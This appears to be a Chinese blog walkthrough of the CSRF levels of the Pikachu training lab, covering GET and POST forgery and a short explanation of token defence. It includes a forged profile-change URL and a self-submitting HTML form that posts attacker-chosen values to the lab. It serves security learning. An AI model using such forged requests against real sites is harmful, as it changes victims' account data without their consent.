CSRF(跨站请求伪造)

概念:也被称为“One Click Attack”或者“Session Riding”,通过伪装来自受信任用户的请求来攻击受信任的网站。

CSRF(get)

关于这关的意义不是很明白,有懂的可以在下面评论区说一下。下面看过程吧。

根据他给的用户名和密码随便进一个,然后发现修改的信息并不会在URL里面显示,然后拿bp抓包,抓的是修改信息内。

发现他的可以修改信息,直接在里面修改完放行,他的个人信息就可以修改完了。

还可以就是把这段   /pikachu-master/vul/csrf/csrfget/csrf_get_edit.php?sex=boy&phonenum=18626545453&add=22&email=vince%40pikachu.com&submit=submit 复制下来加上http和主机地址补充完整,去访问这段网址,直接会跳到修改信息的界面。直接在连接里面改也可以。访问就是直接改完的。图就不放了。

CSRF(post)

发现URL不再显示参数,无法通过URL来伪造请求进行修改,但是本页面可以抓到可以修改的参数,可以通过bp直接修改。方法二:构造表单,这个我试了几次才成功,代码放下面了。

<!DOCTYPE html>
<html><head lang="en"><meta charset="utf-8"><title>csrf的post</title><script>     <!-- 这个script是用来自动提交表单的-->window.onload = function() {document.getElementById("submit").click();}</script></head><body><form action="http://192.168.0.105/pikachu-master/vul/csrf/csrfpost/csrf_post_edit.php" method="post"><input type="text" name="sex" value="boy" /><input type="kobe" name="phonenum" value="18626545453" /><input type="kobe" name="add" value="9" /><input type="kobe" name="email" value="vince@pikachu.com" /><input id="postsubmit" type="submit" name="submit" value="submit" />   </form></body>
</html>

CSRF Token

这关是防范CSRF的常用方法的一个演示。

token验证原理
CSRF的主要问题是敏感操作的链接容易被伪造
每次请求,都增加一个随机码(需要够随机,不容易伪造),后台每次对随机码进行验证

网页接受从后台发过来的token,类型不可见。将其一并提交给后台进行验证。每次刷新,后台发送过来的token都不一样,起到了防止伪造的作用。

pikachu-CSRF通关教程相关推荐

  1. pikachu通关教程通关详解超详细

    pikachu通关教程佛系更新 暴力破解 跨站脚本XSS 反射型XSS(get): 反射型XSS(post): 存储型XSS: Dom型XSS(很鸡肋): xss之盲打: SQL注入 数字型: 字符型 ...

  2. pikachu通关教程

    pikachu通关教程(暴力破解和xss) 1.暴力破解 基于表单的暴力破解 1.最简单的暴力破解没有验证码不需要绕过,直接进行抓包. 直接找到一组账号和密码 验证码绕过(on server) 先进行 ...

  3. 攻防系列——pikachu靶场通关练习

    目录 一.暴力破解 Burte Force(暴力破解)概述 (一)基于表单的暴力破解 (二)验证码绕过(on server) (三)验证码绕过(on client) (四)token 防爆破 二.Cr ...

  4. pikachu靶场通关

    pikachu靶场通关详解 一.靶场介绍 二.靶场配置 三.靶场实战 3.1 暴力破解漏洞 3.1.1暴力破解攻击&暴力破解漏洞概述 3.1.2暴力破解漏洞测试流程 3.1.3基于表单的暴力破 ...

  5. Pikachu靶场通关记录(详细)

    Pikachu靶场通关记录 0x01 靶场介绍 Pikachu是一个带有漏洞的Web应用系统,在这里包含了常见的web安全漏洞. 如果你是一个Web渗透测试学习人员且正发愁没有合适的靶场进行练习,那么 ...

  6. Pikachu靶场通关笔记

    目录 Burte Force(暴力破解) 基于表单的暴力破解 验证码绕过(on server) 验证码绕过(on client) token防暴破 Cross-Site Scripting (XSS) ...

  7. Cheat Engine游戏脚本修改器通关教程(脑残版Step9)

    文章目录 Step 9 方法一 方法二 Step1 - Step8 通关教程地址(该教程写在2017年9月2日,现在疫情宅在家,补完后续教程):https://cylycgs.blog.csdn.ne ...

  8. 视频教程-信息系统项目管理师-通关教程4-软考

    信息系统项目管理师-通关教程4 微信企业号星级会员.10多年软件从业经历,国家级软件项目负责人,主要从事软件研发.软件企业员工技能培训.已经取得计算机技术与软件资格考试(软考)--"信息系统 ...

  9. Upload-Labs靶场 1-21全通关教程

    Upload-Labs通关 靶场介绍 安装 文件上传漏洞介绍 BurpSuite的简单使用 安装BurpSuite 配合Firefox使用 万能WebShell 正文开始 Pass-01 Pass-0 ...

  10. XSS Game通关教程

    12.XSS Game通关教程 1.Ma Spaghet! 审查源码 一个不安全的方式,直接get传输somebody 输入123看看位置 ?somebody=123 如下 用下input标签即可 & ...

最新文章

  1. .gitmodule中没有为非子模块的路径找到子模块映射
  2. 区别聚焦索引和非聚集索引
  3. hybris安装执行install.sh -r b2c_acc initialize遇到build错误 8983端口
  4. 【labelme】改造labelme
  5. mysql性能结构优化原理_MySQL性能管理及架构设计(二):数据库结构优化、高可用架构设计、数据库索引优化...
  6. 鲸鱼优化算法_盘点 35 个 Java 代码优化细节
  7. 面试官 | Oracle JDK 和 OpenJDK 有什么区别?
  8. 剑指offer - 二维数组中的查找
  9. 报表类似选项卡的功能
  10. crm客户管理软件的精髓
  11. Flowplayer简单酷炫的视频播放器
  12. mysql order by file_深聊MySQL,从入门到入坟之:如何让order by、group by查询速度飞起来...
  13. 【报告分享】2021B站创作者生态报告-哔哩哔哩(附下载)
  14. Aggressive cows(c语言)
  15. LG G7解OP开Volte
  16. Makefile的最后一点问题也解决了
  17. 771. 宝石与石头
  18. android软件开发之webView.addJavascriptInterface循环渐进【二】
  19. 鲁大师5.12.15.1184 纯净去广告单文件版
  20. 计算机网络技术的发展模式背景,浅谈计算机网络技术发展模式

热门文章

  1. STM32 f407 3ADC 交替 实现 7.2Msps 采样率
  2. MS-DOS命令汇总
  3. 尚硅谷 周阳老师 SpringCloud 学习笔记
  4. 别在被ChatGPT的账号骗了
  5. Hutool 数字工具-NumberUtil使用(加减乘除,保留小数,格式化数字,是否为数字,随机数,整数列表,阶乘,平方根,最大公约数和最小公倍数,进制转换,比较大小,去除多余的0)
  6. 5G通信与物联网技术交流群
  7. Android 图片着色 Tint 详解2—xml设置、selector
  8. delph mysql结构体,Delphi中的结构体与类
  9. MATLAB的GUI小游戏—你话我猜
  10. 电信云平台NBIOT应用开发,使用C#测试